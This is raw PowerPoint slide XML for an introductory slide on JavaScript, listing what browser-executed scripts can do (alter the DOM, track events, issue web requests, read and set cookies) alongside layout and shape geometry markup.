            <a:off x="1282700" y="5524500"/>
            <a:ext cx="7493000" cy="2133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D93CE6D-FAE7-C848-8572-303BE6D3C72A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2203450"/>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3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7509E0-A093-7841-A0EC-93BE4DFE9A75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="806450"/>
            <a:ext cx="6254750" cy="1741488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2142528" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr sz="6100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="3217"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Powerful </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>programming</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-160" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>language</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{071D6A6F-1733-3B4A-AFBA-69DBB61752D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="2697163"/>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5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC9EADB-7B8D-5A4F-8713-19A529A30E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="2635250"/>
            <a:ext cx="5208588" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Enabling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>factor </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>so-called </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-140" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2.0</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{355F07D8-8E00-4349-8B8B-030720E51148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3424238"/>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7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D37EA212-0033-F74F-9E01-732F1FFD1365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="3371850"/>
            <a:ext cx="7754938" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pages </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>returned </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-180" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE920301-B9C1-A949-A469-8019E041519F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4149725"/>
            <a:ext cx="141287"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9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0B60DB-792A-774D-ADD4-67FB6EDFF2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="4095750"/>
            <a:ext cx="6886575" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="5496404" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>executed by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>They</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A4BBBE-9E3C-4346-8E02-E95E15031C3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4643438"/>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1" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB4188D-92C0-984A-8F92-EBC147675B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5137150"/>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2" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A09B961C-38A7-184D-89ED-E9AB0B7A04E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5629275"/>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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EABB937-750D-2E4B-979E-2CEF9D6C2458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6122988"/>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4" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A885052A-77B9-CA4B-8683-640D31D6BCD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6615113"/>
            <a:ext cx="142875" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="285" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140303" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173870F5-5F9D-484B-9264-77D13C4E4E90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1409700" y="4591050"/>
            <a:ext cx="67818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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alter page contents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="020000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(DOM objects)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="963"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Track events </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(mouse clicks, motion, keystrokes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="188"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Issue web requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp; read replies  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="188"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Read and set cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140304" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEBACB70-8AB3-0645-BA2D-A5B375C13F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7505700" y="561975"/>
            <a:ext cx="1733550" cy="836613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="288925" indent="-276225" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>no relation  to Java</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140305" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44669427-4E3A-3044-AFE8-15349E918A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7399338" y="533400"/>
            <a:ext cx="136525" cy="896938"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 111123 w 137795"/>
              <a:gd name="T1" fmla="*/ 903750 h 896619"/>
              <a:gd name="T2" fmla="*/ 89760 w 137795"/>
              <a:gd name="T3" fmla="*/ 855626 h 896619"/>
              <a:gd name="T4" fmla="*/ 70674 w 137795"/>
              <a:gd name="T5" fmla="*/ 807564 h 896619"/>
              <a:gd name="T6" fmla="*/ 53866 w 137795"/>
              <a:gd name="T7" fmla="*/ 759565 h 896619"/>
              <a:gd name="T8" fmla="*/ 39340 w 137795"/>
              <a:gd name="T9" fmla="*/ 711627 h 896619"/>
              <a:gd name="T10" fmla="*/ 27086 w 137795"/>
              <a:gd name="T11" fmla="*/ 663751 h 896619"/>
              <a:gd name="T12" fmla="*/ 17111 w 137795"/>
              <a:gd name="T13" fmla="*/ 615939 h 896619"/>
              <a:gd name="T14" fmla="*/ 9417 w 137795"/>
              <a:gd name="T15" fmla="*/ 568188 h 896619"/>
              <a:gd name="T16" fmla="*/ 3999 w 137795"/>
              <a:gd name="T17" fmla="*/ 520497 h 896619"/>
              <a:gd name="T18" fmla="*/ 861 w 137795"/>
              <a:gd name="T19" fmla="*/ 472868 h 896619"/>
              <a:gd name="T20" fmla="*/ 0 w 137795"/>
              <a:gd name="T21" fmla="*/ 425302 h 896619"/>
              <a:gd name="T22" fmla="*/ 1417 w 137795"/>
              <a:gd name="T23" fmla="*/ 377798 h 896619"/>
              <a:gd name="T24" fmla="*/ 5112 w 137795"/>
              <a:gd name="T25" fmla="*/ 330356 h 896619"/>
              <a:gd name="T26" fmla="*/ 11088 w 137795"/>
              <a:gd name="T27" fmla="*/ 282975 h 896619"/>
              <a:gd name="T28" fmla="*/ 19336 w 137795"/>
              <a:gd name="T29" fmla="*/ 235659 h 896619"/>
              <a:gd name="T30" fmla="*/ 29870 w 137795"/>
              <a:gd name="T31" fmla="*/ 188408 h 896619"/>
              <a:gd name="T32" fmla="*/ 42675 w 137795"/>
              <a:gd name="T33" fmla="*/ 141208 h 896619"/>
              <a:gd name="T34" fmla="*/ 57762 w 137795"/>
              <a:gd name="T35" fmla="*/ 94070 h 896619"/>
              <a:gd name="T36" fmla="*/ 75124 w 137795"/>
              <a:gd name="T37" fmla="*/ 47015 h 896619"/>
              <a:gd name="T38" fmla="*/ 94770 w 137795"/>
              <a:gd name="T39" fmla="*/ 0 h 8966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7795" h="896619">
                <a:moveTo>
                  <a:pt x="137500" y="896387"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="111065" y="848655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87449" y="800985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66652" y="753376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48674" y="705829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33514" y="658343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21173" y="610919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11652" y="563556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4949" y="516255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1065" y="469015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="421837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1753" y="374720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6326" y="327665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13717" y="280671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23927" y="233739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36957" y="186868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52805" y="140058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71471" y="93311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92957" y="46624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117262" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19645">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object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A11DADA4-D6C0-3E4B-B430-B2DC82E59ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9221788" y="541338"/>
            <a:ext cx="138112" cy="896937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 137795"/>
              <a:gd name="T1" fmla="*/ 903726 h 896619"/>
              <a:gd name="T2" fmla="*/ 27870 w 137795"/>
              <a:gd name="T3" fmla="*/ 855604 h 896619"/>
              <a:gd name="T4" fmla="*/ 52767 w 137795"/>
              <a:gd name="T5" fmla="*/ 807543 h 896619"/>
              <a:gd name="T6" fmla="*/ 74692 w 137795"/>
              <a:gd name="T7" fmla="*/ 759545 h 896619"/>
              <a:gd name="T8" fmla="*/ 93647 w 137795"/>
              <a:gd name="T9" fmla="*/ 711609 h 896619"/>
              <a:gd name="T10" fmla="*/ 109629 w 137795"/>
              <a:gd name="T11" fmla="*/ 663734 h 896619"/>
              <a:gd name="T12" fmla="*/ 122639 w 137795"/>
              <a:gd name="T13" fmla="*/ 615922 h 896619"/>
              <a:gd name="T14" fmla="*/ 132680 w 137795"/>
              <a:gd name="T15" fmla="*/ 568170 h 896619"/>
              <a:gd name="T16" fmla="*/ 139745 w 137795"/>
